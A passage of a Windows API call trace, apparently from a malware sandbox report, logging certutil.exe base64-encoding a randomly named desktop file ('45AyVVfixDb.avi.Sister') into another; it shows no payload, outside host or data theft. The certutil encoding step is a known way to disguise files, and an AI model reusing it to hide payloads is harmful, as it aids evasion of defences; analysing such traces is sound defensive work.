dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0216.556] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff70ad80000 [0216.556] __set_app_type (_Type=0x1) [0216.556] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff70ae6cd90) returned 0x0 [0216.557] __wgetmainargs (in: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8, _DoWildCard=0, _StartInfo=0x7ff70aed38b4 | out: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8) returned 0 [0216.560] _onexit (_Func=0x7ff70ae745a0) returned 0x7ff70ae745a0 [0216.560] _onexit (_Func=0x7ff70ae746c0) returned 0x7ff70ae746c0 [0216.561] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0216.561] GetProcAddress (hModule=0x7ffce9120000, lpProcName="WerSetFlags") returned 0x7ffce913a530 [0216.561] WerSetFlags () returned 0x0 [0216.562] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0216.562] __iob_func () returned 0x7ffcea2dea00 [0216.562] _fileno (_File=0x7ffcea2dea30) returned 1 [0216.562] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0216.562] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437" [0216.563] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437" [0216.563] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437" [0216.564] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437" [0216.564] GetConsoleOutputCP () returned 0x1b5 [0216.667] _vsnwprintf (in: _Buffer=0xfafe48fd00, _BufferCount=0xb, _Format=".%d", _ArgList=0xfafe48fc28 | out: _Buffer=".437") returned 4 [0216.668] _wsetlocale (category=2, locale=".437") returned="English_United States.437" [0216.668] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0216.668] GetFileType (hFile=0x50) returned 0x2 [0216.668] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0216.668] GetProcAddress (hModule=0x7ffce9120000, lpProcName="SetThreadUILanguage") returned 0x7ffce913a990 [0216.668] SetThreadUILanguage (LangId=0x0) returned 0x409 [0216.737] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1=".exe", cchCount1=-1, lpString2=".exe", cchCount2=-1) returned 2 [0216.737] GetCommandLineW () returned="certutil -encode \"45AyVVfixDb.avi.Sister\" \"45AyVVfixDb.avi.Cruel\"" [0216.737] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x22179c2ba00 [0216.737] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x22179c1d010 [0216.737] LocalFree (hMem=0x22179c2ba00) returned 0x0 [0216.737] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x22179c21e40 [0216.738] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x22179c21fc0 [0216.738] LocalFree (hMem=0x22179c21e40) returned 0x0 [0216.738] LocalFree (hMem=0x22179c1d010) returned 0x0 [0216.738] LocalFree (hMem=0x0) returned 0x0 [0216.738] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0216.738] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0216.739] GetCommandLineW () returned="certutil -encode \"45AyVVfixDb.avi.Sister\" \"45AyVVfixDb.avi.Cruel\"" [0216.739] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x22179c2b940 [0216.739] GetSystemTime (in: lpSystemTime=0xfafe48f9f0 | out: lpSystemTime=0xfafe48f9f0*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x12, wMinute=0x30, wSecond=0x33, wMilliseconds=0x117)) [0216.739] SystemTimeToFileTime (in: lpSystemTime=0xfafe48f9f0, lpFileTime=0xfafe48f9e8 | out: lpFileTime=0xfafe48f9e8) returned 1 [0216.739] FileTimeToLocalFileTime (in: lpFileTime=0xfafe48f9e8, lpLocalFileTime=0xfafe48f9b0 | out: lpLocalFileTime=0xfafe48f9b0) returned 1 [0216.739] FileTimeToSystemTime (in: lpFileTime=0xfafe48f9b0, lpSystemTime=0xfafe48f720 | out: lpSystemTime=0xfafe48f720) returned 1 [0216.739] GetDateFormatW (in: Locale=0x400, dwFlags=0x1, lpDate=0xfafe48f720, lpFormat=0x0, lpDateStr=0xfafe48f830, cchDate=128 | out: lpDateStr="4/16/2020") returned 10 [0216.739] GetTimeFormatW (in: Locale=0x400, dwFlags=0x2, lpTime=0xfafe48f720, lpFormat=0x0, lpTimeStr=0xfafe48f730, cchTime=128 | out: lpTimeStr="8:48 PM") returned 8 [0216.739] _vsnwprintf (in: _Buffer=0xfafe48f73e, _BufferCount=0x78, _Format=" %02u.%03us", _ArgList=0xfafe48f708 | out: _Buffer=" 51.279s") returned 8 [0216.739] LocalAlloc (uFlags=0x0, uBytes=0x34) returned 0x22179c2dd40 [0216.740] SetLastError (dwErrCode=0x80070716) [0216.740] _vsnwprintf (in: _Buffer=0xfafe48f7b8, _BufferCount=0xb, _Format="%d", _ArgList=0xfafe48f7a8 | out: _Buffer="948") returned 3 [0216.740] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x3b4, lpBuffer=0xfafe48f570, cchBufferMax=128 | out: lpBuffer="Begin") returned 0x5 [0216.740] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x22179c2b960 [0216.740] LocalAlloc (uFlags=0x0, uBytes=0x640) returned 0x22179c247a0 [0216.740] LocalFree (hMem=0x22179c2dd40) returned 0x0 [0216.740] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xfafe48fa60 | out: lpSystemTimeAsFileTime=0xfafe48fa60*(dwLowDateTime=0xabcbc35c, dwHighDateTime=0x1d6141f)) [0216.740] GetLocalTime (in: lpSystemTime=0xfafe48fa98 | out: lpSystemTime=0xfafe48fa98*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x14, wMinute=0x30, wSecond=0x33, wMilliseconds=0x118)) [0216.740] SystemTimeToFileTime (in: lpSystemTime=0xfafe48fa98, lpFileTime=0xfafe48fa70 | out: lpFileTime=0xfafe48fa70) returned 1 [0216.740] CompareFileTime (lpFileTime1=0xfafe48fa70, lpFileTime2=0xfafe48fa60) returned 1 [0216.741] _vsnwprintf (in: _Buffer=0xfafe48faa8, _BufferCount=0x13, _Format="GMT %s %.2f", _ArgList=0xfafe48fa38 | out: _Buffer="GMT + 2.00") returned 10 [0216.741] LocalFree (hMem=0x22179c2b940) returned 0x0 [0216.741] GetModuleHandleW (lpModuleName="certca.dll") returned 0x7ffcc9760000 [0216.741] FindResourceW (hModule=0x7ffcc9760000, lpName=0x1, lpType=0x10) returned 0x7ffcc9820090 [0216.741] LoadResource (hModule=0x7ffcc9760000, hResInfo=0x7ffcc9820090) returned 0x7ffcc98200b0 [0216.741] LockResource (hResData=0x7ffcc98200b0) returned 0x7ffcc98200b0 [0216.741] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="VS_VERSION_INFO", cchCount1=-1, lpString2="VS_VERSION_INFO", cchCount2=-1) returned 2 [0216.741] _vsnwprintf (in: _Buffer=0x7ff70aed6890, _BufferCount=0x3f, _Format="%u.%u.%u.%u", _ArgList=0xfafe48fad8 | out: _Buffer="10.0.15063.447") returned 14 [0216.741] GetACP () returned 0x4e4 [0216.741] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0216.741] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x22179c2baa0 [0216.741] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x22179c2baa0, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0216.741] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x22179c2df40 [0216.742] _vsnwprintf (in: _Buffer=0x22179c2df40, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xfafe48fb28 | out: _Buffer="10.0.15063.447 retail") returned 21 [0216.742] LocalFree (hMem=0x22179c2baa0) returned 0x0 [0216.742] LocalFree (hMem=0x0) returned 0x0 [0216.742] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdec10000 [0216.742] GetACP () returned 0x4e4 [0216.742] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0216.742] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x22179c2b9a0 [0216.742] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x22179c2b9a0, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0216.742] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x22179c2e000 [0216.742] _vsnwprintf (in: _Buffer=0x22179c2e000, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xfafe48fb28 | out: _Buffer="10.0.15063.447 retail") returned 21 [0216.742] LocalFree (hMem=0x22179c2b9a0) returned 0x0 [0216.742] LocalFree (hMem=0x0) returned 0x0 [0216.742] GetACP () returned 0x4e4 [0216.742] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0216.742] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x22179c2b6c0 [0216.742] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x22179c2b6c0, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0216.742] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x22179c2e040 [0216.742] _vsnwprintf (in: _Buffer=0x22179c2e040, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xfafe48fb58 | out: _Buffer="10.0.15063.447 retail") returned 21 [0216.742] LocalFree (hMem=0x22179c2b6c0) returned 0x0 [0216.743] LocalFree (hMem=0x22179c2df40) returned 0x0 [0216.743] LocalFree (hMem=0x22179c2e000) returned 0x0 [0216.743] LocalFree (hMem=0x22179c2e040) returned 0x0 [0216.743] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0216.743] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0216.743] GetStockObject (i=0) returned 0x900010 [0216.743] RegisterClassW (lpWndClass=0xfafe48fc80) returned 0xc1a2 [0216.743] CreateWindowExW (dwExStyle=0x0, lpClassName="CertUtil", lpWindowName="CertUtil Application", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x7ff70ad80000, lpParam=0x0) returned 0x1402be [0217.043] NtdllDefWindowProc_W () returned 0x0 [0217.043] NtdllDefWindowProc_W () returned 0x1 [0217.051] NtdllDefWindowProc_W () returned 0x0 [0217.059] UpdateWindow (hWnd=0x1402be) returned 1 [0217.059] PostMessageW (hWnd=0x1402be, Msg=0x400, wParam=0x0, lParam=0x22179c1217e) returned 1 [0217.059] GetMessageW (in: lpMsg=0xfafe48fcd0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xfafe48fcd0) returned 1 [0217.059] TranslateMessage (lpMsg=0xfafe48fcd0) returned 0 [0217.059] DispatchMessageW (lpMsg=0xfafe48fcd0) returned 0x0 [0217.059] NtdllDefWindowProc_W () returned 0x0 [0217.059] GetMessageW (in: lpMsg=0xfafe48fcd0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xfafe48fcd0) returned 1 [0217.059] TranslateMessage (lpMsg=0xfafe48fcd0) returned 0 [0217.059] DispatchMessageW (lpMsg=0xfafe48fcd0) returned 0x0 [0217.059] LocalAlloc (uFlags=0x0, uBytes=0x72) returned 0x22179c1f2f0 [0217.060] LocalAlloc (uFlags=0x0, uBytes=0x7e) returned 0x22179c143f0 [0217.060] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="p", cchCount2=-1) returned 1 [0217.060] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="pin", cchCount2=-1) returned 1 [0217.060] SetLastError (dwErrCode=0x80070716) [0217.060] _vsnwprintf (in: _Buffer=0xfafe48f6d8, _BufferCount=0xb, _Format="%d", _ArgList=0xfafe48f6c8 | out: _Buffer="465") returned 3 [0217.060] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1d1, lpBuffer=0xfafe48f490, cchBufferMax=128 | out: lpBuffer="Command Line") returned 0xc [0217.060] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x22179c223b0 [0217.060] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0217.060] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0217.060] GetEnvironmentVariableW (in: lpName="certsrv_rawhex", lpBuffer=0xfafe48f470, nSize=0x104 | out: lpBuffer="\x01") returned 0x0 [0217.060] GetLastError () returned 0xcb [0217.060] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0217.061] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0217.061] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0217.061] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0217.061] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0217.061] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0217.061] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0217.061] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0217.061] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0217.061] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0217.061] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0217.061] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0217.061] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0217.061] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0217.061] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0217.061] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0217.061] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0217.061] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0217.061] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0217.061] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0217.061] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0217.061] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Cryptography\\AutoEnrollment", ulOptions=0x0, samDesired=0x20019, phkResult=0xfafe48f138 | out: phkResult=0xfafe48f138*=0x23c) returned 0x0 [0217.061] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x22179c18530 [0217.061] RegQueryValueExW (in: hKey=0x23c, lpValueName="RawHex", lpReserved=0x0, lpType=0xfafe48f6a8, lpData=0xfafe48f6d8, lpcbData=0xfafe48f6a0*=0x4 | out: lpType=0xfafe48f6a8*=0x0, lpData=0xfafe48f6d8*=0x0, lpcbData=0xfafe48f6a0*=0x4) returned 0x2 [0217.061] LocalFree (hMem=0x22179c18530) returned 0x0 [0217.061] RegCloseKey (hKey=0x23c) returned 0x0 [0217.062] LocalFree (hMem=0x0) returned 0x0 [0217.062] CryptFindOIDInfo (dwKeyType=0x1, pvKey=0x7ff70ae80270, dwGroupId=0x7) returned 0x22179c3c5b0 [0217.072] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount1=-1, lpString2="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount2=-1) returned 2 [0217.072] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="stdio", cchCount2=-1) returned 1 [0217.072] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="LegacyCertSelectionUI", cchCount2=-1) returned 1 [0217.072] lstrcmpW (lpString1="encode", lpString2="uSAGE") returned -1 [0217.072] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="gp", cchCount2=-1) returned 1 [0217.073] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="loc", cchCount2=-1) returned 1 [0217.073] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="ent", cchCount2=-1) returned 1 [0217.073] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="q", cchCount2=-1) returned 1 [0217.073] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dump", cchCount2=-1) returned 3 [0217.073] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dumpPFX", cchCount2=-1) returned 3 [0217.073] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="asn", cchCount2=-1) returned 3 [0217.073] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="", cchCount2=-1) returned 3 [0217.073] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decodehex", cchCount2=-1) returned 3 [0217.073] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encodehex", cchCount2=-1) returned 1 [0217.073] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decode", cchCount2=-1) returned 3 [0217.073] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encode", cchCount2=-1) returned 2 [0217.073] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x22179c41020 [0217.073] GetComputerNameW (in: lpBuffer=0x22179c41020, nSize=0xfafe48f6a0 | out: lpBuffer="NQDPDE", nSize=0xfafe48f6a0) returned 1 [0217.073] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x0, nSize=0xfafe48f670 | out: lpBuffer=0x0, nSize=0xfafe48f670) returned 0 [0217.073] GetLastError () returned 0xea [0217.074] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x22179c2b620 [0217.074] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x22179c2b620, nSize=0xfafe48f670 | out: lpBuffer="NQdPdE", nSize=0xfafe48f670) returned 1 [0217.074] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0217.076] CertCreateCertificateContext (dwCertEncodingType=0x1, pbCertEncoded=0x22179c416f0, cbCertEncoded=0x6ad4) returned 0x0 [0217.117] CertCreateCRLContext (dwCertEncodingType=0x1, pbCrlEncoded=0x22179c416f0, cbCrlEncoded=0x6ad4) returned 0x0 [0217.117] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x4, pbEncoded=0x22179c416f0, cbEncoded=0x6ad4, dwFlags=0x8000, pDecodePara=0xfafe48f550, pvStructInfo=0xfafe48f5e0, pcbStructInfo=0xfafe48f5d4 | out: pvStructInfo=0xfafe48f5e0, pcbStructInfo=0xfafe48f5d4) returned 0 [0217.118] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x15, pbEncoded=0x22179c416f0, cbEncoded=0x6ad4, dwFlags=0x8000, pDecodePara=0xfafe48f550, pvStructInfo=0xfafe48f5e0, pcbStructInfo=0xfafe48f5d4 | out: pvStructInfo=0xfafe48f5e0, pcbStructInfo=0xfafe48f5d4) returned 0 [0217.118] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x3b, pbEncoded=0x22179c416f0, cbEncoded=0x6ad4, dwFlags=0x8000, pDecodePara=0xfafe48f550, pvStructInfo=0xfafe48f5e0, pcbStructInfo=0xfafe48f5d4 | out: pvStructInfo=0xfafe48f5e0, pcbStructInfo=0xfafe48f5d4) returned 0 [0217.118] CryptMsgOpenToDecode (dwMsgEncodingType=0x10001, dwFlags=0x0, dwMsgType=0x0, hCryptProv=0x0, pRecipientInfo=0x0, pStreamInfo=0x0) returned 0x22179c1bc50 [0217.125] CryptMsgUpdate (hCryptMsg=0x22179c1bc50, pbData=0x22179c416f0, cbData=0x6ad4, fFinal=1) returned 0 [0217.126] GetLastError () returned 0x8009310b [0217.126] CryptMsgClose (hCryptMsg=0x22179c1bc50) returned 1 [0217.126] GetFileAttributesExW (in: lpFileName="45AyVVfixDb.avi.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\45ayvvfixdb.avi.sister"), fInfoLevelId=0x0, lpFileInformation=0xfafe48f600 | out: lpFileInformation=0xfafe48f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4657f3a0, ftCreationTime.dwHighDateTime=0x1d5e322, ftLastAccessTime.dwLowDateTime=0x45ca9be0, ftLastAccessTime.dwHighDateTime=0x1d5e48f, ftLastWriteTime.dwLowDateTime=0x45ca9be0, ftLastWriteTime.dwHighDateTime=0x1d5e48f, nFileSizeHigh=0x0, nFileSizeLow=0x6ad4)) returned 1 [0217.126] _vsnwprintf (in: _Buffer=0xfafe48f608, _BufferCount=0xb, _Format="%d", _ArgList=0xfafe48f5f8 | out: _Buffer="359") returned 3 [0217.126] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x167, lpBuffer=0xfafe48f3c0, cchBufferMax=128 | out: lpBuffer="Input Length = %d") returned 0x11 [0217.126] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x22179c41560 [0217.126] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0217.126] _vsnwprintf (in: _Buffer=0xfafe48e5f0, _BufferCount=0x1ff, _Format="Input Length = %d", _ArgList=0xfafe48f648 | out: _Buffer="Input Length = 27348") returned 20 [0217.126] GetFileType (hFile=0x50) returned 0x2 [0217.126] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xfafe48e5f0*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0xfafe48e5a4, lpReserved=0x0 | out: lpBuffer=0xfafe48e5f0*, lpNumberOfCharsWritten=0xfafe48e5a4*=0x14) returned 1 [0217.210] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0217.210] _vsnwprintf (in: _Buffer=0xfafe48e5f0, _BufferCount=0x1ff, _Format="\n", _ArgList=0xfafe48f648 | out: _Buffer="\n") returned 1 [0217.210] GetFileType (hFile=0x50) returned 0x2 [0217.210] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xfafe48e5f0*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xfafe48e5a4, lpReserved=0x0 | out: lpBuffer=0xfafe48e5f0*, lpNumberOfCharsWritten=0xfafe48e5a4*=0x1) returned 1 [0217.395] GetFileAttributesExW (in: lpFileName="45AyVVfixDb.avi.Cruel" (normalized: "c:\\users\\fd1hvy\\desktop\\45ayvvfixdb.avi.cruel"), fInfoLevelId=0x0, lpFileInformation=0xfafe48f600 | out: lpFileInformation=0xfafe48f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac24420a, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0xac24420a, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xac2a5856, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x931c)) returned 1 [0217.395] _vsnwprintf (in: _Buffer=0xfafe48f608, _BufferCount=0xb, _Format="%d", _ArgList=0xfafe48f5f8 | out: _Buffer="361") returned 3 [0217.395] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x169, lpBuffer=0xfafe48f3c0, cchBufferMax=128 | out: lpBuffer="Output Length = %d") returned 0x12 [0217.396] LocalAlloc (uFlags=0x0, uBytes=0x26) returned 0x22179c410b0 [0217.396] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0217.396] _vsnwprintf (in: _Buffer=0xfafe48e5f0, _BufferCount=0x1ff, _Format="Output Length = %d", _ArgList=0xfafe48f648 | out: _Buffer="Output Length = 37660") returned 21 [0217.396] GetFileType (hFile=0x50) returned 0x2 [0217.396] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xfafe48e5f0*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0xfafe48e5a4, lpReserved=0x0 | out: lpBuffer=0xfafe48e5f0*, lpNumberOfCharsWritten=0xfafe48e5a4*=0x15) returned 1 [0217.502] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0217.502] _vsnwprintf (in: _Buffer=0xfafe48e5f0, _BufferCount=0x1ff, _Format="\n", _ArgList=0xfafe48f648 | out: _Buffer="\n") returned 1 [0217.502] GetFileType (hFile=0x50) returned 0x2 [0217.502] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xfafe48e5f0*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xfafe48e5a4, lpReserved=0x0 | out: lpBuffer=0xfafe48e5f0*, lpNumberOfCharsWritten=0xfafe48e5a4*=0x1) returned 1 [0217.593] LocalFree (hMem=0x22179c416f0) returned 0x0 [0217.593] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0217.593] _vsnwprintf (in: _Buffer=0xfafe48f668, _BufferCount=0xb, _Format="%d", _ArgList=0xfafe48f658 | out: _Buffer="2022") returned 4 [0217.594] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x7e6, lpBuffer=0xfafe48f420, cchBufferMax=128 | out: lpBuffer="%ws: -%ws command completed successfully.") returned 0x29 [0217.594] LocalAlloc (uFlags=0x0, uBytes=0x54) returned 0x22179c18830 [0217.594] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0217.594] _vsnwprintf (in: _Buffer=0xfafe48e650, _BufferCount=0x1ff, _Format="%ws: -%ws command completed successfully.", _ArgList=0xfafe48f6a8 | out: _Buffer="CertUtil: -encode command completed successfully.") returned 49 [0217.594] GetFileType (hFile=0x50) returned 0x2 [0217.594] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xfafe48e650*, nNumberOfCharsToWrite=0x31, lpNumberOfCharsWritten=0xfafe48e604, lpReserved=0x0 | out: lpBuffer=0xfafe48e650*, lpNumberOfCharsWritten=0xfafe48e604*=0x31) returned 1 [0217.667] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0217.667] _vsnwprintf (in: _Buffer=0xfafe48e650, _BufferCount=0x1ff, _Format="\n", _ArgList=0xfafe48f6a8 | out: _Buffer="\n") returned 1 [0217.667] GetFileType (hFile=0x50) returned 0x2 [0217.667] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xfafe48e650*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xfafe48e604, lpReserved=0x0 | out: lpBuffer=0xfafe48e650*, lpNumberOfCharsWritten=0xfafe48e604*=0x1) returned 1 [0217.764] LocalFree (hMem=0x0) returned 0x0 [0217.764] LocalFree (hMem=0x22179c143f0) returned 0x0 [0217.764] LocalFree (hMem=0x22179c1f2f0) returned 0x0 [0217.764] SetLastError (dwErrCode=0x80070716) [0217.764] _vsnwprintf (in: _Buffer=0xfafe48f6d8, _BufferCount=0xb, _Format="%d", _ArgList=0xfafe48f6c8 | out: _Buffer="511") returned 3 [0217.764] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1ff, lpBuffer=0xfafe48f490, cchBufferMax=128 | out: lpBuffer="Command Succeeded") returned 0x11 [0217.764] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x22179c41440 [0217.764] PostQuitMessage (nExitCode=0) [0217.764] GetMessageW (in: lpMsg=0xfafe48fcd0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xfafe48fcd0) returned 0 [0217.765] LocalFree 